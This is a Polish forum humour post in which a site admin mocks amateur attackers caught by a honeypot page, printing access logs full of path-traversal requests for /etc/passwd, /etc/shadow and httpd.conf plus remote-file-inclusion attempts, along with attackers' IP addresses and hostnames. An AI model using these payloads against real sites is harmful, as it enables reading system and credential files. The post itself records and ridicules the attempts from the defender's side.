Forum Y-G '04 Strona Główna
RejestracjaSzukajFAQUżytkownicyGrupyGalerieZaloguj
Script-kiddie z dostępem do netu

 
Odpowiedz do tematu    Forum Y-G '04 Strona Główna » Humor Zobacz poprzedni temat
Zobacz następny temat
Script-kiddie z dostępem do netu
Autor Wiadomość
Anubis
Admin
Admin



Dołączył: 31 Sie 2007
Posty: 514
Przeczytał: 0 tematów

Pomógł: 38 razy
Ostrzeżeń: 0/5
Skąd: Małopolska

Post Script-kiddie z dostępem do netu
Po zastawieniu pułapki na lamerów okazuje się, że w sieci działają 2 grupy h0ck00r0w. Pierwsza składająca się z 12 IPków załapała się na maliny koło dwunastej. A druga 12 godzin później.


    195.245.213.8 [01/Mar/2004:12:41:02 /index.php?m=../../../../../../etc/passwd 200
    195.245.213.8 [01/Mar/2004:12:41:43 /index.php?m=../../../../../../etc/shadow 403
    195.245.213.8 [01/Mar/2004:12:41:56 /index.php?m=../../../../../../etc/group 403
    195.245.213.8 [01/Mar/2004:12:41:59 /index.php?m=../../../../../../etc/shadow 403
    195.245.213.8 [01/Mar/2004:12:42:00 /index.php?m=../../../../../../etc/passwd 403
    195.245.213.8 [01/Mar/2004:12:42:00 /index.php?m=../../../../../../etc/shadow 403
    195.245.213.8 [01/Mar/2004:12:42:03 /index.php?m=page&pg_id=42 403
    195.245.213.8 [01/Mar/2004:12:42:06 /index.php?m=page&pg_id=42 403
    195.245.213.8 [01/Mar/2004:12:42:42 /index.php?m=page&pg_id=42 403
    195.245.213.8 [01/Mar/2004:12:42:48 /index.php 403
    195.245.213.8 [01/Mar/2004:12:47:25 /index.php?m=http://www.wp.pl 403
    195.245.213.8 [01/Mar/2004:12:47:32 /index.php?m=http://www.wp.pl 403
    62.233.173.118 [01/Mar/2004:12:47:32 /index.php?m=../../../../../../etc/passwd 200
    62.21.63.21 [01/Mar/2004:12:47:45 /index.php?m=../../../../../../etc/passwd 200
    212.182.0.179 [01/Mar/2004:12:48:00 /index.php?m=../../../../../../etc/passwd 200
    193.0.74.236 [01/Mar/2004:12:48:20 /index.php?m=../../../../../../etc/passwd 200
    212.182.0.179 [01/Mar/2004:12:48:26 /index.php?m=../../../../../../etc/inittab 403
    212.182.0.179 [01/Mar/2004:12:48:34 /index.php?m=../../../../../../etc/issue 403
    212.182.0.179 [01/Mar/2004:12:48:41 /index.php?m=../../../../../../etc/groups 403
    212.182.0.179 [01/Mar/2004:12:48:48 /index.php?m=../../../../../../etc/passwd 403
    62.233.173.118 [01/Mar/2004:12:49:02 /index.php?m=../../../../../../etc/group 403
    212.182.0.179 [01/Mar/2004:12:49:06 /index.php?m=../../../../../../etc/passwd 403
    62.233.173.118 [01/Mar/2004:12:49:06 /index.php?m=../../../../../../etc/passwd 403
    193.0.74.236 [01/Mar/2004:12:49:32 /index.php?m=../../../../../../etc/motd 403
    62.233.173.118 [01/Mar/2004:12:49:33 /index.php?m=../../../../../../etc/passwd 403
    62.21.63.21 [01/Mar/2004:12:49:41 /index.php?m=../../../../../../etc/issue 403
    62.233.173.118 [01/Mar/2004:12:49:45 /index.php?m=../../../../../../etc/passwd 403
    62.21.63.21 [01/Mar/2004:12:49:49 /index.php?m=../../../../../../etc/passwd 403
    212.182.0.179 [01/Mar/2004:12:49:52 /index.php?m=../../../../../../etc/passwd 403
    212.182.0.179 [01/Mar/2004:12:50:35 /index.php 403
    193.0.74.236 [01/Mar/2004:12:50:45 /index.php?m=../../../../../../etc/apache/httpd.conf 403
    62.111.224.130 [01/Mar/2004:12:50:47 /index.php?m=../../../../../../etc/passwd 200
    193.0.74.236 [01/Mar/2004:12:51:21 /index.php?m=../../../../../../var/www 403
    62.111.224.130 [01/Mar/2004:12:51:35 /index.php?m=../../../../../../etc/passwd 403
    195.245.213.8 [01/Mar/2004:12:56:00 /index.php?m=http://www.wp.pl 403
    195.245.213.8 [01/Mar/2004:12:56:01 /index.php 403
    195.245.213.8 [01/Mar/2004:12:56:02 /index.php?m=page&pg_id=42 403
    62.87.189.119 [01/Mar/2004:12:59:15 /index.php?m=../../../../../../etc/passwd 200
    62.87.189.119 [01/Mar/2004:12:59:41 /index.php?m=page&pg_id=16 403
    62.87.189.119 [01/Mar/2004:13:00:03 /index.php?m=../../../../../../etc/issue 403
    62.87.189.119 [01/Mar/2004:13:00:06 /index.php?m=../../../../../../etc/issue.net 403
    62.87.189.119 [01/Mar/2004:13:00:15 /index.php?m=../../../../../../etc/passwd 403
    80.54.227.52 [01/Mar/2004:13:04:05 /index.php?m=../../../../../../etc/passwd 200
    62.21.63.21 [01/Mar/2004:13:05:37 /index.php?m=../../../../../../etc/passwd 403
    195.245.213.8 [01/Mar/2004:13:05:38 /index.php?m=../../../../../../etc/passwd 403
    195.245.213.8 [01/Mar/2004:13:05:45 /index.php?m=../../../../../../etc/passwd 403
    80.54.227.52 [01/Mar/2004:13:06:23 /index.php?m=../../../../../../etc/passwd 403
    80.54.227.52 [01/Mar/2004:13:06:51 /index.php?m=../../../../../../etc/inittab 403
    80.55.36.26 [01/Mar/2004:13:07:33 /index.php?m=../../../../../../etc/motd 302
    212.244.218.42 [01/Mar/2004:13:08:31 /index.php?m=../../../../../../etc/inittab 403
    80.55.36.26 [01/Mar/2004:13:09:04 /index.php?m=../../../../../../etc/apache/httpd.conf 403
    80.55.36.26 [01/Mar/2004:13:09:18 /index.php 403
    80.55.36.26 [01/Mar/2004:13:09:19 /index.php 403
    80.55.36.26 [01/Mar/2004:13:09:21 /index.php 403
    212.244.218.2 [01/Mar/2004:13:09:23 /index.php?m=../../../../../../etc/inittab 403
    217.153.60.98 [01/Mar/2004:14:46:27 /index.php?m=page&pg_id=47 403
    80.50.33.97 [02/Mar/2004:00:37:09 /index.php?m=../../../../../../etc/passwd 200
    217.30.149.192 [02/Mar/2004:00:37:23 /index.php?m=../../../../../../etc/passwd 200
    217.30.149.192 [02/Mar/2004:00:37:34 /index.php?m=../../../../../../etc/passwd 403
    80.50.33.97 [02/Mar/2004:00:37:46 /index.php? 403
    194.9.223.27 [02/Mar/2004:00:38:34 /index.php?m=../../../../../../etc/passwd 200
    217.30.149.192 [02/Mar/2004:00:38:49 /index.php?m=page&pg_id=16 403
    213.76.55.193 [02/Mar/2004:00:39:01 /index.php?m=../../../../../../etc/passwd 200
    194.9.223.27 [02/Mar/2004:00:39:24 /index.php?m=http://costam 403
    194.9.223.27 [02/Mar/2004:00:39:33 /index.php?m=../../../../../../etc/passwd 403
    213.199.194.22 [02/Mar/2004:00:39:53 /index.php?m=../../../../../../etc/passwd 200
    213.199.194.22 [02/Mar/2004:00:40:23 /index.php?m=../../../../../../etc/fstab 403
    213.199.194.22 [02/Mar/2004:00:40:34 /index.php?m=../../../../../../etc/group 403
    213.199.194.22 [02/Mar/2004:00:40:36 /index.php?m=../../../../../../etc/groups 403
    213.199.194.22 [02/Mar/2004:00:40:41 /index.php?m=../../../../../../etc/motd 403
    213.76.55.193 [02/Mar/2004:00:41:55 /index.php?m=../../../../../../etc/motd 403
    213.76.55.193 [02/Mar/2004:00:41:59 /index.php?m=../../../../../../etc/passw 403
    194.9.223.27 [02/Mar/2004:00:42:02 /index.php?m=htp://www.tiamak.republika.pl/test 403
    213.76.55.193 [02/Mar/2004:00:42:03 /index.php?m=../../../../../../etc/passwd 403
    213.76.55.193 [02/Mar/2004:00:42:05 /index.php?m=../../../../../../etc/passwd 403
    194.9.223.27 [02/Mar/2004:00:42:07 /index.php?m=page&pg_id=17 403
    194.9.223.27 [02/Mar/2004:00:42:37 /index.php?m=./.././.././.././.././.././.././.././../etc/passwd 403
    194.9.223.27 [02/Mar/2004:00:42:41 /index.php?m=./.././.././.././.././.././.././.././../etc/passwd 403


Pozwolę sobie podsumować:

* prawdziwy h0ck00r używa nastepujących przeglądarek:

    curl/7.10.3 (i686-pc-linux-gnu) libcurl/7.10.3 OpenSSL/0.9.7c zlib/1.1.4
    curl/7.3 (i686-pc-linux-gnu) libcurl 7.3 (SSL 0.9.5)
    Links (0.98; Linux 2.6.3-1-386 i586; 80x24)
    Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
    Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FunWebProducts)
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0; FunWebProducts)
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [pl]
    Mozilla/5.0 (compatible; Konqueror/3.1; Linux)
    Mozilla/5.0 (Windows NT 5.1; U) Opera 7.23 [pl]
    Mozilla/5.0 (Windows; U; Windows NT 5.0; pl-PL; rv:1.6) Gecko/20040206 Firefox/0.8
    Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007
    Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5) Gecko/20031120
    Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040117
    Opera/7.21 (Windows 98; U) [pl]
    Opera/7.23 (Windows NT 5.1; U) [pl]
    w3m/0.3.2.2



Oczywiście Microsoft & IE rulez.

PS. niech ten drugi sobie lepiej uaktualni OpenSSL-a bo z myśliwego stanie sie zwierzyną.

* goście muszą siedzieć na jakimś ircu lub mieć szybki sposób komunikowania się.

Świadczy o tym rozpiętość czasowa ich wizyt, po kilku minutach od pierwszego wejścia już na stronie była cała watacha żądnych sensacji (czyt. /etc/shadow) h0ck00r0w. Swoja droga ciekaw jestem jakie zjebki dostał gościu, który pierwszy zauważył "lukę" kiedy się zorientowali (?) w mistyfikacji.

* używają raczej dial-upów lub dynamicznych IPków.

193.0.74.236 dhcp236.dwi.uw.edu.pl
194.9.223.27 gprs1.idea.pl
195.214.216.10 e-konta.pl
195.245.213.8 Telewizja Polska S.A. ul. Woronicza 17
212.182.0.179 magellan.umcs.lublin.pl
212.244.218.2 jessie.lonet.gdynia.pl
212.244.218.42 hell.org.pl
213.199.194.22 imp.mt.pl
213.76.55.193 pb193.torun.cvx.ppp.tpnet.pl
217.153.60.98 GTS Internet Partners
217.30.149.192 dial-192.bielsko.dialog.net.pl
217.97.227.138 PIRXNET-GLIWICE
62.111.224.130 host-ip130-224.crowley.pl
62.21.63.21 bacza.icpnet.pl
62.233.173.118 FUTURO-MAN
62.87.189.119 dial-631.bielsko.dialog.net.pl
80.50.33.97 ei97.neoplus.adsl.tpnet.pl
80.54.227.52 de52.neoplus.adsl.tpnet.pl
80.55.36.26 pavulon.apteka.com.pl, sir "LANcaster"

* i jednego proxy

212.182.14.43 matpc-14-43.umcs.lublin.pl

Jeżeli powyższe IPki to OpenProxy to ja nic na to nie poradzę, nie chce mi się tego sprawdzać.

krótko mówiąc ekipa apcohu... nie, no myślałem panowie, że co jak co ale takiemu lamerowi jak ja nie uda się nabić Was w butelkę...

* metody postępowania

używają googli w celu znalezienia odpowiedniego ciągu znaków w URLu (nie powiem czego dokładnie, nie chcę całej armii script-kiddie). Świadczy o tym nagłówek HTTP_REFERER. Zresztą zajrzyjcie na stronę tiamaka (pozdrawiam, gratuluję potomka, 403 Forbidden).

pozwolę sobie zacytować kawałek majla od tiamaka:

to jest sciema conie z tym passwd ktorym wszyscy sie podniecaja ?? Wink
normalnie mie tu ludzie wczoraj az orgazma mieli ;]
az sam musialem luknac
ale to nie wyglada normalnie Razz
moim zdaniem to jest taki fake dla lamuhuf Wink

ODP: przepraszam, nie mogę odpisać, nie mogę się z podłogi podnieść ROTFL

Jak widać na załączonym obrazku wszyscy ci, którzy zechcą przetestować moje zabezpieczenia dostają 403 Forbidden i poczytne miejsce na liście banów.

Jeżeli chcesz się dowiedzieć co takiego przygotowałem dla gości specjalnych, nie wstawiaj w pasku adresu /etc/passwd pobaw się pg_id, wiedząc, że strony-pułapki robiłem dość niedawno... Chyba nie dość wyraźnie zaznaczyłem, że pg_id to liczba dodatnia a nie ciąg znaków, a ja posiadam odpowiednie validatory na wejściu.


Post został pochwalony 0 razy
Pon 18:49, 28 Sty 2008 Zobacz profil autora
Wyświetl posty z ostatnich:    
Odpowiedz do tematu    Forum Y-G '04 Strona Główna » Humor Wszystkie czasy w strefie GMT
Strona 1 z 1

 
Skocz do: 
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach


fora.pl - załóż własne forum dyskusyjne za darmo
Powered by phpBB © 2001, 2005 phpBB Group
Design by Freestyle XL / Music Lyrics.
Regulamin